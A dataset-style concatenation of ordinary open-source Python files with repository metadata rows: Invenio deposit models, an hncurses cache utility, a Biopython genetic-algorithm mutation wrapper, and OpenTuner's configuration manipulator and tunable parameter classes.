        self.metadata = metadata if metadata is not None else {}
self.package = ""
self.timestamp = None
self.agents = []
self.task_ids = []
def __getstate__(self):
return dict(
id=self.uuid,
metadata=self.metadata,
package=self.package,
timestamp=self.timestamp,
task_ids=self.task_ids,
agents=[a.__getstate__() for a in self.agents],
)
def __setstate__(self, state):
self.uuid = state['id']
self._metadata = state.get('metadata', {})
self.package = state.get('package', None)
self.timestamp = state.get('timestamp', None)
self.agents = [Agent.factory(a_state)
for a_state in state.get('agents', [])]
self.task_ids = state.get('task_ids', [])
def seal(self):
self.timestamp = datetime.now(tzutc()).isoformat()
def is_sealed(self):
return self.timestamp is not None
@property
def metadata(self):
return self._metadata
@metadata.setter
def metadata(self, value):
import datetime
import json
class DateTimeEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, (datetime.datetime, datetime.date)):
encoded_object = obj.isoformat()
else:
encoded_object = json.JSONEncoder.default(self, obj)
return encoded_object
data = json.dumps(value, cls=DateTimeEncoder)
self._metadata = json.loads(data)
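# Hedged sketch (not part of the original module): the metadata setter above
# JSON-round-trips its input, so datetimes come back as ISO8601 strings, and
# seal() merely timestamps the package.
def _sip_example():
    sip = SubmissionInformationPackage(metadata={
        'title': 'My record',
        'created': datetime.now(tzutc()),
    })
    iso_created = sip.metadata['created']   # a str, not a datetime object
    sip.seal()
    return iso_created, sip.is_sealed()     # (ISO8601 string, True)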
class Agent(FactoryMixin):
"""Agent."""
def __init__(self, role=None, from_request_context=False):
self.role = role
self.user_id = None
self.ip_address = None
self.email_address = None
if from_request_context:
self.from_request_context()
def __getstate__(self):
return dict(
role=self.role,
user_id=self.user_id,
ip_address=self.ip_address,
email_address=self.email_address,
)
def __setstate__(self, state):
self.role = state['role']
self.user_id = state['user_id']
self.ip_address = state['ip_address']
self.email_address = state['email_address']
def from_request_context(self):
from flask import request
from invenio.ext.login import current_user
self.ip_address = request.remote_addr
self.user_id = current_user.get_id()
self.email_address = current_user.info.get('email', '')
| egabancho/invenio | invenio/modules/deposit/models.py | Python | gpl-2.0 | 47,429 | ["VisIt"] | 3c34e194bd9af2ecdc966d509ff1f6720b9f38f99c391de79e50b26f52402489 |
|
# -*- coding: utf-8 -*-
import json
import os
import time
from config import *
LETTER_Y = [[" _______________________________________________ "],
["| ___________________________________________ |"],
["| | | |"],
["| | | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYYYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | YYYYYYYYYYY | |"],
["| | | |"],
["| |___________________________________________| |"],
["|_______________________________________________|"],
[" HNCURSES "],
[" "],
[" AUTHOR: Brian Houston Morrow "]]
def _dircheck(hn_dir):
'''
Check for hn cache directory and create
if it doesn't exist.
Keyword arguments:
hn_dir -- Directory to store cache information.
'''
try:
os.makedirs(hn_dir)
except OSError:
if not os.path.isdir(hn_dir):
raise
def _filecheck(cachefile):
'''
    Check for cache file, creating it if non-existent.
Keyword arguments:
cachefile -- Filename for cache.
'''
if not os.path.isfile(cachefile):
open(cachefile, "w").close()
def _make_URL(endpoint, id=None):
'''
Construct URL for json API request.
Keyword arguments:
endpoint -- URL endpoint to retrieve.
id -- ID of object to retrieve.
          Defaults to None to allow the retrieval
of index items.
Returns:
URL for specific object.
'''
arr = [BASE_URL, VERSION, endpoint, str(id)] if id\
else [BASE_URL, VERSION, endpoint]
return "/".join(arr) + ".json"
def _check_expired(cachefile, expiry):
'''
Check if the cache file is expired.
Keyword arguments:
cachefile -- Filename for cache.
expiry -- Number of seconds after which cache is expired.
Returns:
True if the cache is expired, False otherwise.
'''
with open(cachefile, "r") as fh:
line1 = fh.readline().rstrip()
        return line1 == "" or int(line1) < _get_time() - expiry
def _get_cache_file(filename, mode):
'''
    Open the cache file, discarding the first line when opening in read
    mode, so callers can read the stories without accidentally picking up
    the cache timestamp.
Keyword arguments:
filename -- Cache filename.
mode -- Mode in which to open the file.
Returns:
File object for cache file.
'''
f = open(filename, mode)
if mode == "r":
f.readline()
return f
def _get_time():
'''
Get current seconds since epoch as an int.
Returns:
int representation of seconds since epoch.
'''
return int(time.time())
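# Usage sketch (illustrative only): how the helpers above are meant to
# compose.  The arguments are assumed to come from config.py via the star
# import (e.g. a cache directory, cache file and expiry); the endpoint name
# and item id below are hypothetical examples, not confirmed constants.
def _example_refresh(hn_dir, cachefile, expiry):
    '''Hypothetical helper showing the intended call order.'''
    _dircheck(hn_dir)
    _filecheck(cachefile)
    if _check_expired(cachefile, expiry):
        # e.g. fetch the index and a single item
        return _make_URL("topstories"), _make_URL("item", id=8863)
    return None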
|
killerbat00/hncurses
|
src/utils.py
|
Python
|
mit
| 4,389
|
[
"Brian"
] |
b301de9d5447bc9d2aa95e1f9854d0bf0beffb251970e77a90d8a2cbe89c031a
|
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
#
"""General functionality for mutations.
"""
# standard library
import random
# local stuff
from Bio.GA.Organism import Organism
class SafeFitnessMutation(object):
"""Perform mutations, but do not allow decreases in organism fitness.
    This doesn't actually do any mutation work, but just checks that
    newly created organisms do not have lower fitnesses.
"""
def __init__(self, actual_mutation, accept_less=0.0):
"""Initialize to do safe mutations
Arguments:
o actual_mutation - A Mutation class which actually implements
        mutation functionality.
o accept_less - A probability to accept mutations which
generate lower fitness. This allows you to accept some
        mutations which reduce fitness, but not all of them.
"""
self._mutation = actual_mutation
self._accept_less_percent = accept_less
self._accept_less_rand = random.Random()
def mutate(self, org):
"""Perform safe mutation of the specified organism.
"""
new_org = self._mutation.mutate(org)
new_org.recalculate_fitness()
if org.fitness > new_org.fitness:
accept_less_chance = self._accept_less_rand.random()
if accept_less_chance <= self._accept_less_percent:
return new_org
else:
return org
else:
return new_org
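# Usage sketch (illustrative only): SafeFitnessMutation wraps another
# mutation operator.  _NoOpMutation below is a stand-in defined purely for
# illustration; a real GA run would pass one of Biopython's mutation
# classes instead.
class _NoOpMutation(object):
    """Illustrative mutator that returns a copy of the organism unchanged."""
    def mutate(self, org):
        return org.copy()

# safe_mutator = SafeFitnessMutation(_NoOpMutation(), accept_less=0.05)
# new_org = safe_mutator.mutate(org)   # never worse, with a 5% tolerance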
|
updownlife/multipleK
|
dependencies/biopython-1.65/build/lib.linux-x86_64-2.7/Bio/GA/Mutation/General.py
|
Python
|
gpl-2.0
| 1,583
|
[
"Biopython"
] |
1fbf3795cdc7d983c057a5df651b21ddc8209516b823dbd4daedbcb1d5b31579
|
# vim: tabstop=2 shiftwidth=2 softtabstop=2 expandtab autoindent smarttab
import abc
import collections
import copy
import hashlib
import json
import logging
import math
import os
import pickle
import random
from fn import _
import argparse
from datetime import datetime
import numpy
import inspect
import sys
log = logging.getLogger(__name__)
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument('--list-params', '-lp',
help='list available parameter classes')
class ConfigurationManipulatorBase(object):
"""
abstract interface for objects used by search techniques to mutate
configurations
"""
__metaclass__ = abc.ABCMeta
# List of file formats, which can be extended by subclasses. Used in
# write_to_file() and load_from_file(). Objects in list must define
# load(fd) and dump(cfg, fd).
FILE_FORMATS = {'default': json, 'json': json,
'pickle': pickle, 'pk': pickle}
def validate(self, config):
"""is the given config valid???"""
return all(map(_.validate(config), self.parameters(config)))
def normalize(self, config):
"""mutate config into canonical form"""
for param in self.parameters(config):
param.normalize(config)
def set_search_driver(self, search_driver):
"""called exactly once during setup"""
pass
def copy(self, config):
"""produce copy of config"""
return copy.deepcopy(config)
def parameters_dict(self, config):
"""convert self.parameters() to a dictionary by name"""
return dict([(p.name, p) for p in self.parameters(config)])
def param_names(self, *args):
"""return union of parameter names in args"""
return sorted(reduce(set.union,
[set(map(_.name, self.parameters(cfg)))
for cfg in args]))
def linear_config(self, a, cfg_a, b, cfg_b, c, cfg_c):
"""return a configuration that is a linear combination of 3 other configs"""
dst = self.copy(cfg_a)
dst_params = self.proxy(dst)
for k in self.param_names(dst, cfg_a, cfg_b, cfg_c):
dst_params[k].op4_set_linear(cfg_a, cfg_b, cfg_c, a, b, c)
return dst
def _get_serializer(self, filename, format=None):
"""
Extract the correct file format serializer from self.FILE_FORMATS.
Guess the format by extension if one is not given.
"""
if format is None:
format = os.path.splitext(filename)[1].lower().replace('.', '')
if format not in self.FILE_FORMATS:
serializer = self.FILE_FORMATS['default']
if len(self.FILE_FORMATS) > 1:
log.warning('Unknown file format "%s", using "%s" instead', format,
serializer.__name__)
else:
serializer = self.FILE_FORMATS[format]
return serializer
def save_to_file(self, cfg, filename, format=None):
"""
Write cfg to filename. Guess the format by extension if one is not given.
"""
with open(filename, 'wb') as fd:
self._get_serializer(filename, format).dump(cfg, fd)
def load_from_file(self, filename, format=None):
"""
Read cfg from filename. Guess the format by extension if one is not given.
"""
with open(filename, 'rb') as fd:
return self._get_serializer(filename, format).load(fd)
def proxy(self, cfg):
return ManipulatorProxy(self, cfg)
@abc.abstractmethod
def random(self):
"""produce a random initial configuration"""
return
@abc.abstractmethod
def parameters(self, config):
"""return a list of of Parameter objects"""
return list()
@abc.abstractmethod
def hash_config(self, config):
"""produce unique hash value for the given config"""
return
class ConfigurationManipulator(ConfigurationManipulatorBase):
"""
a configuration manipulator using a fixed set of parameters and storing
configs in a dict-like object
"""
def __init__(self, params=None, config_type=dict, seed_config=None, **kwargs):
if params is None:
params = []
self.params = list(params)
self.config_type = config_type
self.search_driver = None
self._seed_config = seed_config
super(ConfigurationManipulator, self).__init__(**kwargs)
for p in self.params:
p.parent = self
def add_parameter(self, p):
p.set_parent(self)
self.params.append(p)
#TODO sub parameters should be recursed on
# not currently an issue since no doubly-nested sub-parameters
sub_params = p.sub_parameters()
for sp in sub_params:
sp.set_parent(p)
self.params.extend(sub_params)
def set_search_driver(self, search_driver):
self.search_driver = search_driver
def seed_config(self):
"""produce a fixed seed configuration"""
if self._seed_config:
cfg = copy.deepcopy(self._seed_config)
else:
cfg = self.config_type()
for p in self.params:
if not isinstance(p.name, str) or '/' not in p.name:
cfg[p.name] = p.seed_value()
return cfg
def random(self):
"""produce a random configuration"""
cfg = self.seed_config()
for p in self.parameters(cfg):
p.op1_randomize(cfg)
return cfg
def parameters(self, config):
"""return a list of Parameter objects"""
if type(config) is not self.config_type:
log.error("wrong type, expected %s got %s",
str(self.config_type),
str(type(config)))
raise TypeError()
return self.params
def parameters_to_json(self):
"""
output information about the parameters in this manipulator in json format:
[ConfigurationManipulator,{pinfo:count,pinfo:count ...}]
where pinfo has a similar form to describe the parameter's sub-parameters:
[param_name,{pinfo:count,pinfo:count ...}]
"""
def param_info_to_json(param, sub_parameters):
"""
recursively output information about a parameter and its subparameters in a json format:
[parameter_name, {subparam_info:count,subparam_info:count,...}]
or if no subparams
[parameter_name,{}]
where subparam_info are sorted alphabetically. Note we can't directly use json since
sets/dictionaries aren't always ordered by key
"""
sub_parameter_counts = {}
# build the string
if isinstance(param, str):
param_name = param
else:
param_name = param.__class__.__name__
out = ['[', param_name, ',{']
if len(sub_parameters) > 0:
# count sub params
for sp in sub_parameters:
spout = param_info_to_json(sp, sp.sub_parameters())
sub_parameter_counts[spout] = sub_parameter_counts.get(spout, 0) + 1
# add the count map in sorted order
for sp in sorted(sub_parameter_counts):
out.append(sp)
out.append(':')
out.append(str(sub_parameter_counts[sp]))
out.append(',')
out.pop() # remove trailing comma
out.append('}]')
return ''.join(out)
# filter out subparameters to avoid double counting
params = [p for p in self.params if p.parent is self]
return param_info_to_json(self, params)
def hash_config(self, config):
"""produce unique hash value for the given config"""
m = hashlib.sha256()
params = list(self.parameters(config))
params.sort(key=_.name)
for i, p in enumerate(params):
m.update(str(p.name))
m.update(p.hash_value(config))
m.update(str(i))
m.update("|")
return m.hexdigest()
def search_space_size(self):
"""estimate the size of the search space, not precise"""
return reduce(_ * _, [x.search_space_size() for x in self.params])
def difference(self, cfg1, cfg2):
cfg = self.copy(cfg1)
for param in self.parameters(cfg1):
if param.is_primitive(cfg1):
# TODO: check range
param.set_value(cfg, param.get_value(cfg1) - param.get_value(cfg2))
else:
pass
return cfg
def applySVs(self, cfg, sv_map, args, kwargs):
"""
Apply operators to each parameter according to given map. Updates cfg.
Parameters with no operators specified are not updated.
cfg: configuration data
sv_map: python dict that maps string parameter name to class method name
arg_map: python dict that maps string parameter name to class method
arguments
"""
# TODO: check consistency between sv_map and cfg
param_dict = self.parameters_dict(cfg)
for pname in self.param_names(cfg):
param = param_dict[pname]
getattr(param, sv_map[pname])(cfg, *args[pname], **kwargs[pname])
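# Usage sketch (illustrative only, never called at import time): a minimal
# manipulator with two hypothetical tuning knobs.  IntegerParameter and
# FloatParameter are defined further down in this module.
def _example_manipulator():
  m = ConfigurationManipulator()
  m.add_parameter(IntegerParameter('threads', 1, 16))
  m.add_parameter(FloatParameter('learning_rate', 0.001, 1.0))
  cfg = m.random()                # seed config with each parameter randomized
  return cfg, m.hash_config(cfg)  # stable hash usable as a cache key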
class Parameter(object):
"""
abstract base class for parameters in a ConfigurationManipulator
"""
__metaclass__ = abc.ABCMeta
def __init__(self, name):
self.name = name
self.parent = None
super(Parameter, self).__init__()
def _to_storage_type(self, val):
"""hook to support transformation applied while stored"""
return val
def _from_storage_type(self, sval):
"""hook to support transformation applied while stored"""
return sval
def _read_node(self, config):
"""hook to support different storage structures"""
node = config
if not isinstance(self.name, str):
return node, self.name
name_parts = self.name.split('/')
for part in name_parts[:-1]:
if isinstance(node, list):
part = int(part)
node = node[part]
part = name_parts[-1]
if isinstance(node, list):
part = int(part)
return node, part
def _get(self, config):
"""hook to support different storage structures"""
node, part = self._read_node(config)
return self._from_storage_type(node[part])
def _set(self, config, v):
"""hook to support different storage structures"""
node, part = self._read_node(config)
node[part] = self._to_storage_type(v)
def set_parent(self, manipulator):
self.parent = manipulator
def validate(self, config):
"""is the given config valid???"""
return True
def is_primitive(self, ignored=None):
return isinstance(self, PrimitiveParameter)
def is_permutation(self, ignored=None):
return isinstance(self, PermutationParameter)
def manipulators(self, config):
"""
a list of manipulator functions to change this value in the config
manipulators must be functions that take a config and change it in place
default implementation just has op1_randomize as only operation
"""
return [self.op1_randomize]
def normalize(self, config):
"""
mutate this parameter into a canonical form
"""
pass
def sub_parameters(self):
"""
additional parameters added with this parameter
"""
return []
@abc.abstractmethod
def op1_randomize(self, cfg):
"""
Set this parameter's value in a configuration to a random value
:param config: the configuration to be changed
"""
pass
@abc.abstractmethod
def seed_value(self):
"""some legal value of this parameter (for creating initial configs)"""
return
@abc.abstractmethod
def copy_value(self, src, dst):
"""copy the value of this parameter from src to dst config"""
pass
@abc.abstractmethod
def same_value(self, cfg1, cfg2):
"""test if cfg1 and cfg2 have the same value of this parameter"""
return
@abc.abstractmethod
def hash_value(self, config):
"""produce unique hash for this value in the config"""
return
@abc.abstractmethod
def op4_set_linear(self, cfg, cfg_a, cfg_b, cfg_c, a, b, c):
"""
Sets the parameter value in a configuration to a linear combination of 3
other configurations: :math:`a*cfg_a + b*cfg_b + c*cfg_c`
:param cfg: the configuration to be changed
:param cfg_a: a parent configuration
:param cfg_b: a parent configuration
:param cfg_c: a parent configuration
:param a: weight for cfg_a
:param b: weight for cfg_b
:param c: weight for cfg_c
"""
pass
def search_space_size(self):
return 1
def op1_nop(self, cfg):
"""
The 'null' operator. Does nothing.
:param cfg: the configuration to be changed
"""
pass
# Stochastic variators
def op3_swarm(self, cfg, cfg1, cfg2, c, c1, c2, *args, **kwargs):
"""
Stochastically 'move' the parameter value in a configuration towards those
in two parent configurations. This is done by calling :py:meth:`opn_stochastic_mix`
:param cfg: the configuration to be changed
:param cfg1: a parent configuration
:param cfg2: a parent configuration
:param c: weight of original configuration
:param c1: weight for cfg1
:param c2: weight for cfg2
"""
# default to probabilistic treatment
self.opn_stochastic_mix(cfg, [cfg, cfg1, cfg2], [c, c1, c2])
def opn_stochastic_mix(self, cfg, cfgs, ratio, *args, **kwargs):
"""
Stochastically recombine a list of parent values into a single result.
This randomly copies a value from a list of parents configurations according
to a list of weights.
:param cfg: the configuration to be changed
:param cfgs: a list of parent configurations
:param ratio: a list of floats representing the weight of each configuration
in cfgs
"""
assert len(cfgs) == len(ratio)
r = random.random()
c = numpy.array(ratio, dtype=float) / sum(ratio)
for i in range(len(c)):
if r < sum(c[:i + 1]):
self.copy_value(cfg, cfgs[i])
break
class PrimitiveParameter(Parameter):
"""
An abstract interface implemented by parameters that represent a single
dimension in a cartesian space in a legal range
"""
__metaclass__ = abc.ABCMeta
def __init__(self, name, value_type=float, **kwargs):
self.value_type = value_type
super(PrimitiveParameter, self).__init__(name, **kwargs)
def hash_value(self, config):
"""produce unique hash for this value in the config"""
self.normalize(config)
return hashlib.sha256(repr(self.get_value(config))).hexdigest()
def copy_value(self, src, dst):
"""copy the value of this parameter from src to dst config"""
self.set_value(dst, self.get_value(src))
def same_value(self, cfg1, cfg2):
"""test if cfg1 and cfg2 have the same value of this parameter"""
return self.get_value(cfg1) == self.get_value(cfg2)
def is_integer_type(self):
"""true if self.value_type can only represent integers"""
return self.value_type(0) == self.value_type(0.1)
def get_unit_value(self, config):
"""get_value scaled such that range is between 0.0 and 1.0"""
low, high = self.legal_range(config)
if self.is_integer_type():
# account for rounding
low -= 0.4999
high += 0.4999
val = self.get_value(config)
if low < high:
return float(val - low) / float(high - low)
else:
if low > high:
log.warning('invalid range for parameter %s, %s to %s',
self.name, low, high)
# only a single legal value!
return 0.0
def set_unit_value(self, config, unit_value):
"""set_value scaled such that range is between 0.0 and 1.0"""
assert 0.0 <= unit_value <= 1.0
low, high = self.legal_range(config)
if self.is_integer_type():
# account for rounding
low -= 0.4999
high += 0.4999
if low < high:
val = unit_value * float(high - low) + low
if self.is_integer_type():
val = round(val)
val = max(low, min(val, high))
self.set_value(config, self.value_type(val))
def op1_normal_mutation(self, cfg, sigma=0.1, *args, **kwargs):
"""
apply normally distributed noise to this parameter's value in a
configuration
:param cfg: The configuration to be changed
:param sigma: the std. deviation of the normally distributed noise on a unit
scale
"""
v = self.get_unit_value(cfg)
v += random.normalvariate(0.0, sigma)
# handle boundary cases by reflecting off the edge
if v < 0.0:
v *= -1.0
if v > 1.0:
v = 1.0 - (v % 1)
self.set_unit_value(cfg, v)
def op4_set_linear(self, cfg, cfg_a, cfg_b, cfg_c, a, b, c):
"""
set the parameter value in a configuration to a linear combination of 3
other configurations: :math:`a*cfg_a + b*cfg_b + c*cfg_c`
:param cfg: The configuration to be changed
:param cfg_a: a parent configuration
:param cfg_b: a parent configuration
:param cfg_c: a parent configuration
:param a: weight for cfg_a
:param b: weight for cfg_b
:param c: weight for cfg_c
"""
va = self.get_unit_value(cfg_a)
vb = self.get_unit_value(cfg_b)
vc = self.get_unit_value(cfg_c)
v = a * va + b * vb + c * vc
v = max(0.0, min(v, 1.0))
self.set_unit_value(cfg, v)
def manipulators(self, config):
"""
a list of manipulator functions to change this value in the config
manipulators must be functions that take a config and change it in place
for primitive params default implementation is uniform random and normal
"""
return [self.op1_randomize, self.op1_normal_mutation]
@abc.abstractmethod
def set_value(self, config, value):
"""assign this value in the given configuration"""
pass
@abc.abstractmethod
def get_value(self, config):
"""retrieve this value from the given configuration"""
return 0
@abc.abstractmethod
def legal_range(self, config):
"""return the legal range for this parameter, inclusive"""
return 0, 1
class NumericParameter(PrimitiveParameter):
"""
A parameter representing a number with a minimum and maximum value
"""
def __init__(self, name, min_value, max_value, **kwargs):
"""min/max are inclusive"""
assert min_value <= max_value
super(NumericParameter, self).__init__(name, **kwargs)
# after super call so self.value_type is initialized
self.min_value = self.value_type(min_value)
self.max_value = self.value_type(max_value)
def seed_value(self):
"""some legal value of this parameter (for creating initial configs)"""
return self.min_value
def set_value(self, config, value):
assert value >= self.min_value
assert value <= self.max_value
self._set(config, value)
def get_value(self, config):
return self._get(config)
def legal_range(self, config):
return self.min_value, self.max_value
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration to a random value in its legal
range
:param config: the configuration to be changed
"""
if self.is_integer_type():
self.set_value(config, random.randint(*self.legal_range(config)))
else:
self.set_value(config, random.uniform(*self.legal_range(config)))
def op1_scale(self, cfg, k):
"""
Scale this parameter's value in a configuration by a constant factor
:param cfg: the configuration to be changed
:param k: the constant factor to scale the parameter value by
"""
v = self.get_value(cfg) * k
v = max(self.min_value, min(self.max_value, v))
self.set_value(cfg, v)
def op3_difference(self, cfg, cfg1, cfg2):
"""
Set this parameter's value in a configuration to the difference between this
parameter's values in 2 other configs (cfg2 - cfg1)
:param cfg: the configuration to be changed
:param cfg1: The configuration whose parameter value is being subtracted
:param cfg2: The configuration whose parameter value is subtracted from
"""
v = self.get_value(cfg2) - self.get_value(cfg1)
v = max(self.min_value, min(self.max_value, v))
self.set_value(cfg, v)
def opn_sum(self, cfg, *cfgs):
"""
    Set this parameter's value in a configuration to the sum of its values in a
list of configurations
:param cfg: the configuration to be changed
:param cfgs: a list of configurations to sum
"""
v = sum([self.get_value(c) for c in cfgs])
v = max(self.min_value, min(self.max_value, v))
self.set_value(cfg, v)
def search_space_size(self):
if self.value_type is float:
return 2 ** 32
else:
return self.max_value - self.min_value + 1 # inclusive range
class IntegerParameter(NumericParameter):
"""
A parameter representing an integer value in a legal range
"""
def __init__(self, name, min_value, max_value, **kwargs):
"""min/max are inclusive"""
kwargs['value_type'] = int
super(IntegerParameter, self).__init__(name, min_value, max_value, **kwargs)
def op3_swarm(self, cfg, cfg1, cfg2, c=1, c1=0.5,
c2=0.5, velocity=0, sigma=0.2, *args, **kwargs):
"""
Simulates a single update step in particle swarm optimization by updating
the current position and returning a new velocity.
The new velocity is given by
.. math:: c*velocity + r1*c1*(cfg1-cfg) + r2*c2*(cfg2-cfg)
where r1 and r2 are random values between 0 and 1.
The new current position is the new velocity with gaussian noise added.
:param cfg: the configuration to be changed. Represents the current position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param c: the weight of the current velocity
:param c1: weight of cfg1
:param c2: weight of cfg2
:param velocity: the old velocity
:param sigma: standard deviation of the gaussian noise, on a unit-scale
:return: the new velocity, a float
"""
vmin, vmax = self.legal_range(cfg)
k = vmax - vmin
# calculate the new velocity
v = velocity * c + (self.get_value(cfg1) - self.get_value(
cfg)) * c1 * random.random() + (self.get_value(
cfg2) - self.get_value(cfg)) * c2 * random.random()
# Map velocity to continuous space with sigmoid
s = k / (1 + numpy.exp(-v)) + vmin
# Add Gaussian noise
p = random.gauss(s, sigma * k)
# Discretize and bound
p = int(min(vmax, max(round(p), vmin)))
self.set_value(cfg, p)
return v
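# Worked example (illustrative numbers) for the update above: with an
# IntegerParameter over 0..10 (k = 10), current value 4, local best 8,
# global best 2, c=1, c1=c2=0.5 and velocity=0, the new velocity is
#   v = r1*0.5*(8-4) + r2*0.5*(2-4) = 2*r1 - r2        (r1, r2 in [0, 1))
# so v lies in (-1, 2); it is then squashed to s = 10/(1+exp(-v)),
# perturbed by gauss(s, sigma*10) and clamped/rounded back into 0..10.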
class FloatParameter(NumericParameter):
def __init__(self, name, min_value, max_value, **kwargs):
"""min/max are inclusive"""
kwargs['value_type'] = float
super(FloatParameter, self).__init__(name, min_value, max_value, **kwargs)
def op3_swarm(self, cfg, cfg1, cfg2, c=1, c1=0.5,
c2=0.5, velocity=0, *args, **kwargs):
"""
Simulates a single update step in particle swarm optimization by updating
the current position and returning a new velocity.
The new velocity is given by
.. math:: c*velocity + r1*c1*(cfg1-cfg) + r2*c2*(cfg2-cfg)
where r1 and r2 are random values between 0 and 1
The new current position is the old current position offset by the new
velocity:
:param cfg: the configuration to be changed. Represents the current position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param c: the weight of the current velocity
:param c1: weight of cfg1
:param c2: weight of cfg2
:param velocity: the old velocity
:return: the new velocity, a float
"""
vmin, vmax = self.legal_range(cfg)
v = velocity * c + (self.get_value(cfg1) - self.get_value(
cfg)) * c1 * random.random() + (self.get_value(
cfg2) - self.get_value(cfg)) * c2 * random.random()
p = self.get_value(cfg) + v
p = min(vmax, max(p, vmin))
self.set_value(cfg, p)
return v
class ScaledNumericParameter(NumericParameter):
"""
A Parameter that is stored in configurations normally, but has a scaled
value when accessed using 'get_value'.
Because search techniques interact with Parameters through get_value, these
parameters are searched on a different scale (e.g. log scale).
"""
@abc.abstractmethod
def _scale(self, v):
"""
    called on a value when getting it from its configuration. Transforms the
actual value to the scale it is searched on
"""
return v
@abc.abstractmethod
def _unscale(self, v):
"""
    called on a value when storing it. Transforms a value from its search scale
    to its actual value
"""
return v
def set_value(self, config, value):
NumericParameter.set_value(self, config, self._unscale(value))
def get_value(self, config):
return self._scale(NumericParameter.get_value(self, config))
def legal_range(self, config):
return map(self._scale, NumericParameter.legal_range(self, config))
class LogIntegerParameter(ScaledNumericParameter, FloatParameter):
"""
an integer value that is searched on a log scale, but stored without scaling
"""
def _scale(self, v):
return math.log(v + 1.0 - self.min_value, 2.0)
def _unscale(self, v):
v = 2.0 ** v - 1.0 + self.min_value
v = int(round(v))
return v
def legal_range(self, config):
low, high = NumericParameter.legal_range(self, config)
    # increase the bounds to account for rounding
return self._scale(low - 0.4999), self._scale(high + 0.4999)
class LogFloatParameter(ScaledNumericParameter, FloatParameter):
"""
a float parameter that is searched on a log scale, but stored without scaling
"""
def _scale(self, v):
return math.log(v + 1.0 - self.min_value, 2.0)
def _unscale(self, v):
v = 2.0 ** v - 1.0 + self.min_value
return v
class PowerOfTwoParameter(ScaledNumericParameter, IntegerParameter):
"""
An integer power of two, with a min and max value. Searched by the exponent
"""
def __init__(self, name, min_value, max_value, **kwargs):
kwargs['value_type'] = int
assert min_value >= 1
assert math.log(min_value, 2) % 1 == 0 # must be power of 2
assert math.log(max_value, 2) % 1 == 0 # must be power of 2
super(PowerOfTwoParameter, self).__init__(name, min_value, max_value,
**kwargs)
def _scale(self, v):
return int(math.log(v, 2))
def _unscale(self, v):
return 2 ** int(v)
def legal_range(self, config):
return int(math.log(self.min_value, 2)), int(math.log(self.max_value, 2))
def search_space_size(self):
return int(math.log(super(PowerOfTwoParameter, self).search_space_size(), 2))
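# Usage sketch (illustrative only, never called at import time): a
# power-of-two block size is stored as 1, 2, 4, ..., 64 but searched on its
# exponent.  The parameter name and bounds are made up.
def _example_power_of_two():
  p = PowerOfTwoParameter('block', 1, 64)
  cfg = {'block': p.seed_value()}   # stored value, here the minimum: 1
  return p.legal_range(cfg)         # exponent range searched on: (0, 6)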
##################
class ComplexParameter(Parameter):
"""
A non-cartesian parameter that can't be manipulated directly, but has a set
of user defined manipulation functions
"""
def copy_value(self, src, dst):
"""copy the value of this parameter from src to dst config"""
self._set(dst, copy.deepcopy(self._get(src)))
def same_value(self, cfg1, cfg2):
"""test if cfg1 and cfg2 have the same value of this parameter"""
return self._get(cfg1) == self._get(cfg2)
def hash_value(self, config):
"""produce unique hash for this value in the config"""
self.normalize(config)
return hashlib.sha256(repr(self._get(config))).hexdigest()
def get_value(self, config):
return self._get(config)
def set_value(self, config, value):
self._set(config, value)
def op4_set_linear(self, cfg, cfg_a, cfg_b, cfg_c, a, b, c):
"""
set this value to :math:`a*cfg_a + b*cfg_b + c*cfg_c`
this operation is not possible in general with complex parameters but
we make an attempt to "fake" it for common use cases
basically a call to randomize unless after normalization,
a = 1.0, b == -c, and cfg_b == cfg_c, in which case nothing is done
:param cfg: the configuration to be changed
:param cfg_a: a parent configuration
:param cfg_b: a parent configuration
:param cfg_c: a parent configuration
:param a: weight for cfg_a
:param b: weight for cfg_b
:param c: weight for cfg_c
"""
# attempt to normalize order, we prefer a==1.0
if a != 1.0 and b == 1.0: # swap a and b
a, cfg_a, b, cfg_b = b, cfg_b, a, cfg_a
if a != 1.0 and c == 1.0: # swap a and c
a, cfg_a, c, cfg_c = c, cfg_c, a, cfg_a
# attempt to normalize order, we prefer b==-c
if b < c: # swap b and c
b, cfg_b, c, cfg_c = c, cfg_c, b, cfg_b
if b != -c and a == -c: # swap a and c
a, cfg_a, c, cfg_c = c, cfg_c, a, cfg_a
if a == 1.0 and b == -c:
self.copy_value(cfg_a, cfg)
self.add_difference(cfg, b, cfg_b, cfg_c) # TODO inline this logic?
else:
# TODO: should handle more cases
self.op1_randomize(cfg)
def add_difference(self, cfg_dst, scale, cfg_b, cfg_c):
"""
add the difference cfg_b-cfg_c to cfg_dst
this is the key operation used in differential evolution
and some simplex techniques
this operation is not possible in general with complex parameters but
we make an attempt to "fake" it
"""
if not self.same_value(cfg_b, cfg_c):
self.op1_randomize(cfg_dst)
@abc.abstractmethod
def op1_randomize(self, config):
"""
randomize this value without taking into account the current position
:param config: the configuration to be changed
"""
pass
@abc.abstractmethod
def seed_value(self):
"""some legal value of this parameter (for creating initial configs)"""
return
class BooleanParameter(ComplexParameter):
def manipulators(self, config):
